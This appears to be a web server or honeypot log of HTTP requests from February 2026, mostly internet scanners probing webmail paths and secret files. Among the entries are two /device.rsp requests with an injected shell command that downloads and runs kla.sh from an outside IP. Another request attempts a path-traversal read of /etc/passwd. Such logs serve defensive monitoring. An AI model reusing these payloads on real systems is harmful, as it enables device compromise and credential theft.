Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45255
Path: /rcube/
URL: /rcube/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45241
Path: /mail/
URL: /mail/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45235
Path: /roundcube
URL: /roundcube
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45229
Path: /roundcube/
URL: /roundcube/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45221
Path: /webmail
URL: /webmail
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.3
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45215
Path: /webmail/
URL: /webmail/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
[2026-02-22 10:56:14] Main page accessed - IP: 5.101.157.87:45211
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45211
Path: /
URL: /
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
[2026-02-22 10:56:14] Main page accessed - IP: 5.101.157.87:45209
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45209
Path: /
URL: /
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 193.149.189.126:7227
RemoteAddr: 64.89.160.111:1504
Path:
URL: //193.149.189.126:7227
Method: CONNECT
[2026-02-22 10:06:34] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru
RemoteAddr: 147.185.132.100:58652
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 09:49:29] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.112:14678
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 08:00:05] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.112:14616
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 07:59:59] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.112:14606
Path: *
URL: *
Method: PRI
[2026-02-22 07:59:59] === HTTP Request ===
[2026-02-22 07:59:57] Main page accessed - IP: 66.132.153.112:38922
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.112:38922
Path: /
URL: /
Method: GET
[2026-02-22 07:59:57] === HTTP Request ===
[2026-02-22 07:35:40] Main page accessed - IP: 205.210.31.110:59678
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.110:59678
Path: /
URL: /
Method: GET
[2026-02-22 07:35:40] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 198.235.24.64:62610
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 07:09:32] === HTTP Request ===
[2026-02-22 07:01:58] Main page accessed - IP: 209.38.131.131:52236
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 209.38.131.131:52236
Path: /
URL: /
Method: GET
[2026-02-22 07:01:58] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Gpc: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Fetch-Dest: document
Sec-Fetch-Site: none
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 137.184.138.116:46418
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 06:46:44] === HTTP Request ===
[2026-02-22 06:46:44] Main page accessed - IP: 137.184.138.116:46408
===================
Accept-Encoding: gzip, deflate
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.5
Sec-Gpc: 1
Sec-Fetch-Dest: document
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Site: none
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 137.184.138.116:46408
Path: /
URL: /
Method: GET
[2026-02-22 06:46:44] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru
RemoteAddr: 205.210.31.237:59588
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 06:39:58] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: inventory.vulnberries.ru
RemoteAddr: 147.185.132.106:62806
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 06:38:11] === HTTP Request ===
[2026-02-22 06:15:49] Main page accessed - IP: 66.228.53.136:45646
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.228.53.136:45646
Path: /
URL: /
Method: GET
[2026-02-22 06:15:49] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: anzan.tech
RemoteAddr: 198.235.24.186:62416
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 04:42:33] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: media.vulnberries.ru
RemoteAddr: 205.210.31.193:62700
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 04:17:16] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: auth.vulnberries.ru
RemoteAddr: 205.210.31.193:64188
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 04:13:47] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru
RemoteAddr: 205.210.31.223:57970
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 04:09:25] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.241:38894
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-02-22 03:42:43] === HTTP Request ===
===================
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.175.136
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54218
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-22 03:03:16] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50007
Path: /.streamlit/secrets.toml
URL: /.streamlit/secrets.toml
Method: GET
[2026-02-22 02:27:05] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:32972
Path: /jars
URL: /jars
Method: GET
[2026-02-22 01:08:15] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.14:47132
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 00:33:14] === HTTP Request ===
[2026-02-22 00:33:14] Main page accessed - IP: 85.217.140.14:47126
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.14:47126
Path: /
URL: /
Method: GET
[2026-02-22 00:33:14] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: warehouse.vulnberries.ru
RemoteAddr: 205.210.31.42:57736
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 00:31:50] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 64.112.126.83:50011
Path: /.cursorrules
URL: /.cursorrules
Method: GET
[2026-02-21 22:59:30] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50030
Path: /client_secret.json
URL: /client_secret.json
Method: GET
[2026-02-21 20:29:49] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.12:44310
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-21 20:26:47] === HTTP Request ===
[2026-02-21 20:26:47] Main page accessed - IP: 85.142.100.12:44306
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.12:44306
Path: /
URL: /
Method: GET
[2026-02-21 20:26:47] === HTTP Request ===
[2026-02-21 20:26:47] Main page accessed - IP: 85.142.100.12:53991
===================
Accept: */*
User-Agent: User-Agent ("Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)")
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 85.142.100.12:53991
Path: /
URL: /
Method: GET
[2026-02-21 20:26:47] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50029
Path: /credentials.json
URL: /credentials.json
Method: GET
[2026-02-21 20:14:45] === HTTP Request ===
===================
Body: {}
Accept-Encoding: gzip
Content-Type: application/json
Content-Length: 2
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 67.213.118.179:63234
Path: /session
URL: /session
Method: POST
[2026-02-21 20:03:14] === HTTP Request ===
[2026-02-21 19:46:54] Main page accessed - IP: 147.185.132.114:53773
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.114:53773
Path: /
URL: /
Method: GET
[2026-02-21 19:46:54] === HTTP Request ===
[2026-02-21 18:11:39] Main page accessed - IP: 195.3.221.86:45002
===================
Connection: close
User-Agent: python-requests/2.31.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:45002
Path: /
URL: /
Method: GET
[2026-02-21 18:11:39] === HTTP Request ===
[2026-02-21 17:54:49] Main page accessed - IP: 147.185.132.57:58424
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru
RemoteAddr: 147.185.132.57:58424
Path: /
URL: /
Method: GET
[2026-02-21 17:54:49] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:55928
Path: /jars
URL: /jars
Method: GET
[2026-02-21 17:31:53] === HTTP Request ===
[2026-02-21 16:50:06] Main page accessed - IP: 176.65.149.45:33460
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:33460
Path: /
URL: /
Method: GET
[2026-02-21 16:50:06] === HTTP Request ===
===================
Cookie: uid=admin
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:46836
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-02-21 16:44:32] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:43100
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-02-21 16:44:25] === HTTP Request ===
[2026-02-21 16:42:04] Main page accessed - IP: 205.210.31.235:58220
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: inventory.vulnberries.ru
RemoteAddr: 205.210.31.235:58220
Path: /
URL: /
Method: GET
[2026-02-21 16:42:04] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50021
Path: /constants.py
URL: /constants.py
Method: GET
[2026-02-21 15:48:24] === HTTP Request ===
[2026-02-21 15:46:57] Main page accessed - IP: 204.76.203.8:45774
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:45774
Path: /
URL: /
Method: GET
[2026-02-21 15:46:57] === HTTP Request ===
[2026-02-21 15:36:53] Main page accessed - IP: 87.236.176.100:38335
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.236.176.100:38335
Path: /
URL: /
Method: GET
[2026-02-21 15:36:53] === HTTP Request ===
[2026-02-21 15:35:11] Main page accessed - IP: 204.76.203.8:48862
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:48862
Path: /
URL: /
Method: GET
[2026-02-21 15:35:11] === HTTP Request ===
[2026-02-21 15:12:06] Main page accessed - IP: 204.76.203.8:58956
===================
Connection: close
Accept: text/html,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:58956
Path: /
URL: /
Method: GET
[2026-02-21 15:12:06] === HTTP Request ===
[2026-02-21 15:06:14] Main page accessed - IP: 204.76.203.8:44774
===================
Connection: close
Accept: text/html,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:44774
Path: /
URL: /
Method: GET
[2026-02-21 15:06:14] === HTTP Request ===
[2026-02-21 14:58:46] Main page accessed - IP: 204.76.203.8:53330
===================
Connection: close
Accept: text/html,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:53330
Path: /
URL: /
Method: GET
[2026-02-21 14:58:46] === HTTP Request ===
[2026-02-21 14:42:53] Main page accessed - IP: 204.76.203.8:47062
===================
Connection: close
Accept: text/html,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:47062
Path: /
URL: /
Method: GET
[2026-02-21 14:42:53] === HTTP Request ===
[2026-02-21 14:32:46] Main page accessed - IP: 176.65.148.196:35366
===================
Connection: close
Accept: text/html,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 176.65.148.196:35366
Path: /
URL: /
Method: GET
[2026-02-21 14:32:46] === HTTP Request ===
[2026-02-21 12:24:07] Main page accessed - IP: 20.163.14.22:48682
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.163.14.22:48682
Path: /
URL: /
Method: GET
[2026-02-21 12:24:07] === HTTP Request ===
[2026-02-21 12:05:30] Main page accessed - IP: 198.235.24.203:59576
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru
RemoteAddr: 198.235.24.203:59576
Path: /
URL: /
Method: GET
[2026-02-21 12:05:30] === HTTP Request ===
[2026-02-21 11:30:18] Main page accessed - IP: 204.76.203.8:35550
===================
User-Agent: Hello World
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:35550
Path: /
URL: /
Method: GET
[2026-02-21 11:30:18] === HTTP Request ===
[2026-02-21 11:23:11] Main page accessed - IP: 204.76.203.8:43054
===================
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Origin: http://95.143.191.38:8081
Accept-Language: en-GB,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:43054
Path: /
URL: /
Method: GET
[2026-02-21 11:23:11] === HTTP Request ===
[2026-02-21 10:09:21] Main page accessed - IP: 89.110.97.157:35320
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:35320
Path: /
URL: /
Method: GET
[2026-02-21 10:09:21] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.34.212.9:51050
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-02-21 09:03:07] === HTTP Request ===
[2026-02-21 08:29:35] Main page accessed - IP: 35.233.5.189:35460
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.233.5.189:35460
Path: /
URL: /
Method: GET
[2026-02-21 08:29:35] === HTTP Request ===
[2026-02-21 07:23:13] Main page accessed - IP: 130.12.180.127:28918
===================
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Linux Gnu (cow)
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 130.12.180.127:28918
Path: /
URL: /
Method: GET
[2026-02-21 07:23:13] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.115:21148
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-21 07:00:06] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.115:14722
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-21 06:59:51] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.115:14710
Path: *
URL: *
Method: PRI
[2026-02-21 06:59:50] === HTTP Request ===
[2026-02-21 06:59:49] Main page accessed - IP: 66.132.153.115:14672
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.115:14672
Path: /
URL: /
Method: GET
[2026-02-21 06:59:49] === HTTP Request ===
[2026-02-21 06:31:45] Main page accessed - IP: 34.78.183.19:54964
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.78.183.19:54964
Path: /
URL: /
Method: GET
[2026-02-21 06:31:45] === HTTP Request ===
===================
------WebKitFormBoundaryx106946237477--
------WebKitFormBoundaryx106946237477
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx106946237477
